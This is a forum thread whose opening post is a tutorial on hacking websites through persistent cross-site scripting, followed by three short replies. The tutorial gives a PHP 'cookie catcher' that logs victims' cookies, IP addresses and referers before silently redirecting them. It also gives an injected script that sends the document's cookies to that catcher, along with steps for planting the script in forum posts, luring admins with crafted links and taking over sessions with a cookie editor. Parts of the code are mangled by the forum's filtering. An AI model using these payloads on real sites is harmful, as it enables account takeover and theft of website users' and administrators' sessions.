Results 1 to 4 of 4
  1. #1
    House's Avatar
    Join Date
    Mar 2010
    Gender
    male
    Posts
    2,990
    Reputation
    223
    Thanks
    9,296
    My Mood
    Cynical

    [Tutorial]XSS (Cross Site Scripting)

    I am going teach you How to hack a website through XSS (Persistent Cross Site Scripting).

    I wrote it because i didnt find a Nice Tut to explain XSS. I didnt added much pics as I dont want to hack an website for just a tut. But this is pretty much easy and you will learn without much difficulties.


    " Something about XSS " :-


    XSS is basically using java scripts in different forms to get internet details of a user’s profile of respective website. With the help of XSS we can steal the cookies of the owner of the website.
    XSS is a very large concept and your success rate depends on your imagination and experience.
    Like SQL Injection, keylogging are the certain things, where you follow certain steps to execute something.
    Where XSS is just understanding the way we can use java scripts,
    and the vulnerabilities of the website may be at the different places for executing your java scripts.


    So I could say that XSS or Cross site scripting means to take advantage of web applications that takes the user input but doesn’t filter them properly. This allows an attacker to inject HTML or other codes to get some hidden information out of it. Most common information that people look with
    XSS is Cookies. The cookies are used to maintain user authentication of respective website.



    " XSS " :-


    * Search terms :- Almost all of the websites have search boxes where you can try to search something from the website.
    In the search box you can type your malicious script and check the vulnerability.



    * Text Boxes :- If you see any type of text boxes in the website which will basically let you
    put some query in it.

    So we are trying to find a place where we can write something, which will later be shown in the same webpage.



    " Types of XSS " :-


    There are 2 types of XSS vulnerability.


    • 1. Persistent Cross Site Scripting
    • 2. Non-persistent Cross site Scripting.




    Lets go for Persistent Cross Site Scripting.


    " Persistent Cross Site Scripting " :-



    Persistent Cross Site Scripting vulnerability would take place if the malicious code which you inject would be permanent on respective website. To understand it better. I will give u a little example.

    Suppose if you found a forum which is vulnerable to XSS. Then you can make a “New Topic” or “New Thread” in the forum. Every time some user or the admin opens up that particular thread, your code would be executed which wouldn’t have been filtered due to lacks in the security of the website and user’s or admin’s cookies would be sent to you on a “cookie catcher”, which would be a .php file stored on your own website. This website could be a free hosting website.



    Lets Suppose we have Website.com.


    " Checking for Vulnerability " :-



    Now, the very first thing we will have to see is a place where we can input some text,
    and later on that should be displayed.

    For example of secure sites,in MPGH.net, we have a search bar, so in the search bar lets
    put “H0u53” and hit enter.
    You will see that it will say “Sorry, but no results were returned using the query information you provided.
    Please redefine your search terms and try again.”.
    But you should notice here that it doesn’t say “No search results found for “H0u53”.
    So it means that it is not Echoing the word that we put into the search bar.
    So there is no chance to exlpoit the search bar of MPGH.

    " Testing Java Scripts " :-


    Now, since we know that the website is vulnerable to XSS.
    We will try to run a small java script into the website.



    <script type="text/javascript"> alert('website') </script>


    So what this will do is, it will popup a little alert box saying “Cycl0ne” on it.
    And if it does that, it means that it accepts the javascripts input as well.


    Remember : you can even use - <script type="text/javascript"> alert('your Name') </script>

    It will show something like -



    Once, you’re done just clikc on the "Ok" or “Preview” button at the bottom.
    And in the next page you should get a popup that says “Website”.


    " Finding Cookies " :-


    Now, since we have seen that the website IS accepting javascript inputs and executing them on the next page, lets try to do something else with the javascripts. First of all, i want you guyz to understand what are cookies and where do you find them. Type the following command into the address bar of your web browser.

    javascript:alert(documen*****okie)


    As soon as you type that command and hit enter on the keyboard, it should make some popup which will show you your cookies of respective website. Make sure you are logged in to check your cookies. As i said before, cookies are the things which handles the sessions information and logs you in every time you visit the website.
    By doing this you can see your own cookies, but it would not help an attack UNLESS, we find some way to get those cookies sent to us.


    Now, lets try to find a way to get these cookies sent to us with the help of the java scripts.



    " Creating Cookie Catcher " :-



    Cookie catcher is a file, which you will have to upload to some of your web hosting account, and change its permission to 777 so it can grab the cookies. Copy the following code and paste it to your notepad.

    <?php
    $cookie = $_GET['c'];
    $ip = getenv (‘REMOTE_ADDR’);
    $date=date(“j F, Y, g:i a”);;
    $referer=getenv (‘HTTP_REFERER’);
    $fp = fopen(‘cookies.html’, ‘a’);
    fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
    fclose($fp);
    header (“Location: https://www.yoursite.com”);
    ?>



    Just a little elaboration about the script. The first statement will get the cookies.
    Second statement will get the IP. Third statement will get the referer. T
    he last link would send the slave to “Yoursite.com”.
    To make it a little less suspecious, you can change the link to Cycl0ne.com,
    so the slave wouldnt see anything unusual. so on. Copy the given code and put it into a notepad.
    Save it as something.php. Just make sure that you change the format to “.php”.

    You’ll need a free webhosting account where you can upload the file. I personally use “spam.com”, so create an account there and upload this php file. Make sure that you change its permissions to “777″.



    " Testing Cookie Catcher " :-


    Now, as you guyz have seen that we have been executing a little script in that page which brings
    up an alert bar, lets go a little advanced. Lets try to send our own cookies to our cookie catcher.



    <script>document.location=”link-of-your-cookie-catcher?c=” + documen*****okies</script>



    " Elaboration on the script " :-



    Document.Location will change the location of the website and we have set it equals to the
    link of your cookies catcher and “?c=” we’ve added because its a get statement.
    “+ documen*****okies” means to visit your cookie catcher with the cookies of your slave’s site
    so it can record it.



    Now, here is the second

    Lets try if it works or not. I am going to using the script that I have shown in the
    “Something” page of website.com.


    Now, If you click on Ok or Preview, it will take you to yoursite.com OR whatever you have changed
    the link to in the Cookie Catcher. Now, lets login back to spam.com account, and you will
    notice another “cookies.html” file has been added, automatically.



    Now, if you open up the new automatically uploaded file, you will notice some cookies insde that file.


    Cookie: undefined
    IP: MY IP
    Date and Time: 3 April, 2010, 2:03 am
    Referer: https://www.website.com/preview.php?incli...ect=2009&i[/color]ncident_hour_select=8&incident_min_select=30&incid ent_AMPM_
    select=AM&policyNo=&cellNo=&preview=Preview



    Note: This will look a little different from actual cookies, because when i stole these,
    i wasnt logged in, so if a user is logged in, then you should get a little different from this.

    Now, Get “cookie editor” addon of mozilla firefox.


    " Stealing Actual Cookies " :-


    Till now, we were our own slave, we were trying to steal our own cookies to make sure this works.
    Now, lets try to get some actual victims. In the site, you may have to PREVIEW the post first and
    then submit it. So the javascript is getting executed whenever you preview it, so we can not
    submit it because the script is already executed. And may be in other sites, you can directly
    submit the post, so the moment someone opens it, you will get the cookies.


    Whenever you put the script in the “NAME” and something something in other fields, you click on preview,
    QUICKLY, before it redirects you to the website as described in your cookie stealer,
    the URL will change to something else for a moment.Thats what you will have to copy. What i copied was this.


    https://website.com/preview.php?inclinati...ew=Preview


    And then , you just give this link to your slave, as soon as they click ON it, you get the cookies.

    It is really useful because in other cases, you wouldn’t have to ask the victims to click on the link,
    you will actually submit the report. So as soon as someone reads it you get the cookies.
    Last edited by House; 01-13-2011 at 08:43 AM.

  2. The Following 4 Users Say Thank You to House For This Useful Post:

    Archangel (01-15-2011),Drake (01-16-2011),Khalifa (01-15-2011),WoopwoopaJiggaboo (01-15-2011)

  3. #2
    Based God's Avatar
    Join Date
    Mar 2010
    Gender
    male
    Posts
    2,283
    Reputation
    213
    Thanks
    197
    My Mood
    Asleep

    thats nice...
    [IMG]https://i1091.photobucke*****m/albums/i382/RianGrimm/drift.jpg[/IMG]
    From Vocal


  4. #3
    Velocity's Avatar
    Join Date
    Jan 2010
    Gender
    male
    Posts
    4,376
    Reputation
    106
    Thanks
    773
    still dont get it
    how we hack pimpslord.com?
    we just give the link to Admin?

  5. #4
    Alen's Avatar
    Join Date
    Oct 2007
    Gender
    male
    Location
    Liquid Generator
    Posts
    27,920
    Reputation
    2548
    Thanks
    4,224
    My Mood
    Fine
    Quote Originally Posted by Gunnez360 View Post
    still dont get it
    how we hack pimpslord.com?
    we just give the link to Admin?
    The idea is to embed your own script on their page. If you can manage that (so that a user will run your script on their page) you can have that script grab the cookies and send them to your server (aka you).